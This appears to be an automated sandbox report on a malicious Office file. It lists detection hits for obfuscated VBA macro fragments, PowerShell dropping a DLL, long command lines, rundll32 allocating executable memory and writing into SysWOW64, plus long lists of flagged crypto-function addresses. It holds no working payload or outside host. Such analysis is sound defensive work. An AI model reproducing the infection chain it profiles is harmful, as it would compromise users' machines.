Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set hiZkEEF = hSbDPCC.CreateTextFile("pygNv:\znIpFIR\yniMs.nmiIGDEDA") Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set UPhhYZEF = lEOlGYxK.CreateTextFile("sojcFeJ:\zxDxYHq\rNbtS.PtHuEEP") Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String createtextfile: Set bPFNuJ = VcIiQJFi.CreateTextFile("gNgYGZ:\CatdBMGGg\qGsdAdOQH.cJsxtdJE") Name: Bp63ahh3hb4hyq
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set OBwIBy = QZjuH.CreateTextFile("EEGvGuF:\XrXnHGDDB\noadJZ.yGcKj") Name: Y4o_ocvl0jti6oho0r
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Y4o_ocvl0jti6oho0r, String createtextfile: Set EUMDPGt = UUoAB.CreateTextFile("XFtOCOULb:\dMKcFHF\GAGPCEp.ZPnnAM") Name: Y4o_ocvl0jti6oho0r
Document contains an embedded VBA with base64 encoded strings
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String vRrzDEngIQvFPJfE
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String kWzGMzIVefGB
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Dn5440l_hb7, String TthascRlxHZH
Source: VBA code instrumentation OLE, VBA macro: Module Oi5oelv0_s4, Function Bp63ahh3hb4hyq, String utFMeJhUKJhJ
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Jump to dropped file
Very long command line found
Source: unknown Process created: Commandline size = 5293
Source: unknown Process created: Commandline size = 5197
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 5197 Jump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write
Creates files inside the system directory
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vpdqbmffwwlyu\ Jump to behavior
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_1000976F 7_2_1000976F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026B41F 7_2_0026B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00262C63 7_2_00262C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00273895 7_2_00273895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C0C6 7_2_0026C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026EE78 7_2_0026EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026568E 7_2_0026568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002702C3 7_2_002702C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002742DA 7_2_002742DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00268736 7_2_00268736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00267B63 7_2_00267B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00274B41 7_2_00274B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027340A 7_2_0027340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027687F 7_2_0027687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026F444 7_2_0026F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026E05A 7_2_0026E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027A0AF 7_2_0027A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002648BD 7_2_002648BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002680BA 7_2_002680BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002660B9 7_2_002660B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027889D 7_2_0027889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002688E5 7_2_002688E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00261CFA 7_2_00261CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002720C5 7_2_002720C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026F536 7_2_0026F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00270D33 7_2_00270D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026153C 7_2_0026153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00277D03 7_2_00277D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026B112 7_2_0026B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00275D1D 7_2_00275D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00278D1C 7_2_00278D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027511B 7_2_0027511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002669A0 7_2_002669A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00276DB9 7_2_00276DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002761B8 7_2_002761B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00279586 7_2_00279586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026F98C 7_2_0026F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00266D9F 7_2_00266D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00267998 7_2_00267998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002731E2 7_2_002731E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002771EF 7_2_002771EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00269A37 7_2_00269A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00264A35 7_2_00264A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00262A30 7_2_00262A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00277A0F 7_2_00277A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00275A61 7_2_00275A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026EA4C 7_2_0026EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002662A3 7_2_002662A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00261280 7_2_00261280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002712E2 7_2_002712E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002726F5 7_2_002726F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002696CD 7_2_002696CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00278ADC 7_2_00278ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026BB3A 7_2_0026BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00270F0C 7_2_00270F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00272B16 7_2_00272B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00277F1F 7_2_00277F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026C769 7_2_0026C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00270B68 7_2_00270B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026E377 7_2_0026E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00271773 7_2_00271773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00268F78 7_2_00268F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00265B79 7_2_00265B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00279B45 7_2_00279B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00272349 7_2_00272349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00278F49 7_2_00278F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00266754 7_2_00266754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026B75F 7_2_0026B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002617AC 7_2_002617AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002773AC 7_2_002773AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0027878F 7_2_0027878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026839D 7_2_0026839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00273FE7 7_2_00273FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_0026D7EB 7_2_0026D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002767E9 7_2_002767E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_002763C1 7_2_002763C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00271BDF 7_2_00271BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00269FDC 7_2_00269FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024B41F 8_2_0024B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00242C63 8_2_00242C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024EE78 8_2_0024EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024568E 8_2_0024568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00253895 8_2_00253895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024C0C6 8_2_0024C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002502C3 8_2_002502C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002542DA 8_2_002542DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00248736 8_2_00248736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00247B63 8_2_00247B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00254B41 8_2_00254B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002563C1 8_2_002563C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00244A35 8_2_00244A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00249A37 8_2_00249A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00242A30 8_2_00242A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00257A0F 8_2_00257A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0025340A 8_2_0025340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00255A61 8_2_00255A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0025687F 8_2_0025687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024F444 8_2_0024F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024EA4C 8_2_0024EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024E05A 8_2_0024E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002462A3 8_2_002462A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0025A0AF 8_2_0025A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002448BD 8_2_002448BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002460B9 8_2_002460B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002480BA 8_2_002480BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00241280 8_2_00241280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0025889D 8_2_0025889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002488E5 8_2_002488E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002512E2 8_2_002512E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002526F5 8_2_002526F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00241CFA 8_2_00241CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002520C5 8_2_002520C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002496CD 8_2_002496CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00258ADC 8_2_00258ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024F536 8_2_0024F536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00250D33 8_2_00250D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024153C 8_2_0024153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024BB3A 8_2_0024BB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00257D03 8_2_00257D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00250F0C 8_2_00250F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00252B16 8_2_00252B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024B112 8_2_0024B112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00255D1D 8_2_00255D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00258D1C 8_2_00258D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00257F1F 8_2_00257F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0025511B 8_2_0025511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024C769 8_2_0024C769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00250B68 8_2_00250B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024E377 8_2_0024E377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00251773 8_2_00251773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00248F78 8_2_00248F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00245B79 8_2_00245B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00259B45 8_2_00259B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00252349 8_2_00252349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00258F49 8_2_00258F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00246754 8_2_00246754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024B75F 8_2_0024B75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002469A0 8_2_002469A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002417AC 8_2_002417AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002573AC 8_2_002573AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00256DB9 8_2_00256DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002561B8 8_2_002561B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00259586 8_2_00259586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024F98C 8_2_0024F98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0025878F 8_2_0025878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024839D 8_2_0024839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00246D9F 8_2_00246D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00247998 8_2_00247998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00253FE7 8_2_00253FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002531E2 8_2_002531E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002571EF 8_2_002571EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_002567E9 8_2_002567E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_0024D7EB 8_2_0024D7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00249FDC 8_2_00249FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00251BDF 8_2_00251BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AB41F 9_2_003AB41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AEE78 9_2_003AEE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A2C63 9_2_003A2C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B3895 9_2_003B3895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A568E 9_2_003A568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B42DA 9_2_003B42DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B02C3 9_2_003B02C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AC0C6 9_2_003AC0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A8736 9_2_003A8736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A7B63 9_2_003A7B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B4B41 9_2_003B4B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B63C1 9_2_003B63C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A2A30 9_2_003A2A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A9A37 9_2_003A9A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A4A35 9_2_003A4A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B340A 9_2_003B340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B7A0F 9_2_003B7A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B687F 9_2_003B687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B5A61 9_2_003B5A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AE05A 9_2_003AE05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AEA4C 9_2_003AEA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AF444 9_2_003AF444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A80BA 9_2_003A80BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A60B9 9_2_003A60B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A48BD 9_2_003A48BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003BA0AF 9_2_003BA0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A62A3 9_2_003A62A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B889D 9_2_003B889D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A1280 9_2_003A1280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A1CFA 9_2_003A1CFA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B26F5 9_2_003B26F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B12E2 9_2_003B12E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A88E5 9_2_003A88E5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B8ADC 9_2_003B8ADC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A96CD 9_2_003A96CD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B20C5 9_2_003B20C5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003ABB3A 9_2_003ABB3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A153C 9_2_003A153C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B0D33 9_2_003B0D33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AF536 9_2_003AF536
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B511B 9_2_003B511B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B7F1F 9_2_003B7F1F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B5D1D 9_2_003B5D1D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B8D1C 9_2_003B8D1C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AB112 9_2_003AB112
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B2B16 9_2_003B2B16
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B0F0C 9_2_003B0F0C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B7D03 9_2_003B7D03
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A8F78 9_2_003A8F78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A5B79 9_2_003A5B79
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B1773 9_2_003B1773
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AE377 9_2_003AE377
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AC769 9_2_003AC769
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B0B68 9_2_003B0B68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AB75F 9_2_003AB75F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A6754 9_2_003A6754
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B2349 9_2_003B2349
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B8F49 9_2_003B8F49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B9B45 9_2_003B9B45
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B6DB9 9_2_003B6DB9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B61B8 9_2_003B61B8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A17AC 9_2_003A17AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B73AC 9_2_003B73AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A69A0 9_2_003A69A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A7998 9_2_003A7998
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A6D9F 9_2_003A6D9F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A839D 9_2_003A839D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B878F 9_2_003B878F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AF98C 9_2_003AF98C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B9586 9_2_003B9586
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003AD7EB 9_2_003AD7EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B67E9 9_2_003B67E9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B71EF 9_2_003B71EF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B31E2 9_2_003B31E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B3FE7 9_2_003B3FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003B1BDF 9_2_003B1BDF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003A9FDC 9_2_003A9FDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021B41F 10_2_0021B41F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212C63 10_2_00212C63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021EE78 10_2_0021EE78
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021568E 10_2_0021568E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00223895 10_2_00223895
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002202C3 10_2_002202C3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021C0C6 10_2_0021C0C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002242DA 10_2_002242DA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00218736 10_2_00218736
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00217B63 10_2_00217B63
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00224B41 10_2_00224B41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002263C1 10_2_002263C1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00212A30 10_2_00212A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00214A35 10_2_00214A35
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00219A37 10_2_00219A37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022340A 10_2_0022340A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00227A0F 10_2_00227A0F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00225A61 10_2_00225A61
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022687F 10_2_0022687F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021F444 10_2_0021F444
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021EA4C 10_2_0021EA4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0021E05A 10_2_0021E05A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002162A3 10_2_002162A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022A0AF 10_2_0022A0AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002160B9 10_2_002160B9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002180BA 10_2_002180BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002148BD 10_2_002148BD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00211280 10_2_00211280
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_0022889D 10_2_0022889D
